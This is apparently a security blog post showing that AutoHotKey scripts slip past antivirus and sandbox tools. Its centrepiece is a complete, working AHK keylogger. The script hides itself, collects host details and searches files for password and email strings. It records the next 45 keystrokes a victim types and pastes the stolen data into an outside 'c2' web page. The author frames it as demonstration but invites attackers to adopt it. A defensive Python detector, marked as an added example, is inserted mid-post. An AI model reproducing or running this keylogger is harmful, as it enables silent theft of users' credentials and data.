Don’t You Forget About AutoHotKey



In a world of “fileless malware”, elaborately chained attacks, living-off-the-land, and countless other use cases of fanciness, it’s easy to forget some of the older and more basic things that will likely blindside every security appliance you employ. If your organization does application whitelisting properly or proactively addresses software potentially used for malicious actions, then you may have already mitigated this issue and can stop reading…

However, for those of us in the real world, please continue to hear me out. AutoHotKey scripts can achieve nearly every action a threat actor would ever want to achieve on a machine and then some. The software is often used by technical administrators and developers with heightened privileges to accomplish repetitive tasks, financial analysts with access to sensitive data, and operational folks to accomplish day-to-day business tasks. The scripts and tools that can be generated can save countless hours across an organization, but should we allow it?

The issue with AutoHotKey (AHK) is that it is used by so many people to accomplish important tasks that it is regarded as “safe” and whitelisted outright by many of the security products available. In tandem with this, most security solutions simply don’t have the baked-in logic to understand or even ingest the file for analysis. Running an obviously malicious, non-obfuscated, and seemingly straightforward piece of AHK malware (code below) through VirusTotal shows a hit rate of 0/59. News flash: Windows Defender didn’t really help here either.

VirusTotal Results

What about CrowdStrike? As one of the top EDR/NGAV/sandboxes available in the industry, you’d imagine it would easily handle this, right? Well… not so fast, as the CrowdStrike Falcon sandbox is not able to analyze these files properly according to their documentation.

The Falcon Sandbox supports PE files (.exe, .scr, .pif, .dll, .com, .cpl, etc.), Office (.doc, .docx, .ppt, .pps, .pptx, .ppsx, .xls, .xlsx, .rtf, .pub), PDF, APK, executable JAR, Windows Script Component (.sct), Windows Shortcut (.lnk), Windows Help (.chm), HTML Application (.hta), Windows Script File (*.wsf), Javascript (.js), Visual Basic (*.vbs, *.vbe), Shockwave Flash (.swf), Perl (.pl), Powershell (.ps1, .psd1, .psm1), Scalable Vector Graphics (.svg), Python (.py) and Perl (.pl) scripts, Linux ELF executables, MIME RFC 822 (*.eml) and Outlook *.msg files.

CrowdStrike Falcon Sandbox File Types

Recently there have been attempts to use AHK for pulling files down from various repositories such as GitHub, Bitbucket, and many others. Some examples:

AutoHotKey & BitBucket Used as Malware Slinger
Router DNS Hijacking - AutoHotKey and BitBucket

Let’s move on to the rudimentary example that I’ve created…

Disclaimer – I am not responsible for how you may use this code or any interpretation or modification of the below code in any way. This is for demonstration and education purposes only.

#NoTrayIcon

m::

Send, {enter}

Run, cmd.exe /c date /t > C:\ProgramData\txt.txt & time /t >> C:\ProgramData\txt.txt & hostname >> C:\ProgramData\txt.txt & ipconfig >> C:\ProgramData\txt.txt & findstr /S /i "pass @ email" *.txt* >> C:\ProgramData\txt.txt

Sleep, 200

Loop, 45

{

Input, KeyLog, L1

FileAppend, `n%KeyLog%, C:\ProgramData\txt.txt

Send, %KeyLog%

}

Run, cmd.exe /c clip < C:\ProgramData\txt.txt

Run, https://www.threatable.io/c2

Sleep, 400

Send, ^v{enter}^w

Sleep, 1000

Let’s break this down a little bit here… It won’t spawn a tray icon because of the #NoTrayIcon directive. It triggers when the person types the letter “m”, such as at the end of “facebook.com” or “bank.com”, and then Sends the enter key to seamlessly move the person to their website of choice. It will run the commands date, time, hostname, and ipconfig, and then finally search the files under the working directory of the user’s command prompt for strings pertaining to passwords and emails, appending all of the data to a file.

This all happens rather "silently" to an average user, and in milliseconds, apart from the actual file creation in the ProgramData directory. The script will then keylog the input for the next 45 characters, likely the credentials for the site the victim is visiting. More importantly, it captures the input in a variable and Sends the keylogged character so as not to tip them off that nothing is being typed into the website form. Utilizing the clipboard (the clip command), all it takes for a “c2” is a landing page with a textbox waiting to POST the information and a Control+V, then a quick exit out of the browser with Control+W. It will then sleep for a second and wait for the next website visit.
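
Since the point above is that most tooling never ingests .ahk files at all, here is a defender-side static triage pass over script text that flags the behaviour pairs just described (capture plus file write, capture plus replay, clipboard plus browser launch). It is an added example, not part of the original post or of any product: the rule names, the combinations and both sample scripts are constructed for illustration, and the URL is a placeholder.

```python
import re

# Optional "hotkey::" prefix, so "m::Run, ..." written on one line is still seen.
PRE = r"^\s*(?:\S+::\s*)?"
# Per-line indicators for AutoHotkey v1 command syntax (case-insensitive).
RULES = {
    "hidden_tray": re.compile(PRE + r"#NoTrayIcon\b", re.I),
    "key_capture": re.compile(PRE + r"Input\s*,|\bInputHook\s*\(", re.I),
    "file_write":  re.compile(PRE + r"FileAppend\s*,", re.I),
    "shell_exec":  re.compile(PRE + r"Run(Wait)?\s*,.*\b(cmd|powershell)(\.exe)?\b", re.I),
    "clipboard":   re.compile(r"\bclip(\.exe)?\s*<|" + PRE + r"Clipboard\s*:?=", re.I),
    "open_url":    re.compile(PRE + r"Run(Wait)?\s*,\s*https?://", re.I),
    "key_replay":  re.compile(PRE + r"Send\w*\s*,.*%\w+%", re.I),
}
# A single indicator is common in legitimate scripts; the pairs are what matter.
COMBOS = [
    ({"key_capture", "file_write"}, "captured keystrokes written to disk"),
    ({"key_capture", "key_replay"}, "captured keystrokes replayed to the window"),
    ({"clipboard", "open_url"}, "clipboard staged alongside a browser launch"),
    ({"hidden_tray", "shell_exec"}, "shell commands from a script with no tray icon"),
]

def triage(script_text):
    """Return ({rule: [line numbers]}, [combination findings]) for one script."""
    hits = {}
    for lineno, line in enumerate(script_text.splitlines(), 1):
        code = re.sub(r"(^|\s);.*$", "", line)  # AHK comment: ';' at start or after space
        for name, rx in RULES.items():
            if rx.search(code):
                hits.setdefault(name, []).append(lineno)
    findings = [msg for needed, msg in COMBOS if needed <= set(hits)]
    return hits, findings

# Constructed sample: a shortened form of the script shown earlier on this page.
SUSPECT = r"""#NoTrayIcon
m::
Run, cmd.exe /c hostname >> C:\ProgramData\txt.txt
Input, KeyLog, L1
FileAppend, `n%KeyLog%, C:\ProgramData\txt.txt
Send, %KeyLog%
Run, cmd.exe /c clip < C:\ProgramData\txt.txt
Run, https://c2.example.invalid/
"""
# Constructed benign sample: a hotstring and an application launcher.
BENIGN = "; expand initials into a signature\n::sig::Kind regards, Alex\n^!n::Run, notepad.exe\n"

if __name__ == "__main__":
    print(triage(SUSPECT)[1], triage(BENIGN)[1])
```

Run it over the .ahk files an inventory sweep turns up; a script that only launches programs or expands text produces no findings, while the combinations surface the scripts worth a manual read.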

This sample took roughly an hour to put together at most. Honestly, the procrastination to write this blog post took infinitely longer at this point. I think mixing and mashing with other techniques this could be a valuable technique going forward for attackers to consider adding to their toolbelt. If nothing else, it could help facilitate other parts of the chain indicated by the use of AHK to pull files down by the previously mentioned malware samples.

I hope you all enjoyed this blog post. If you have any ideas for things you would like to see out of my site or would like to further collaborate in relation to anything cybersecurity always feel free to reach out to me on Twitter @InfoSec_Pom.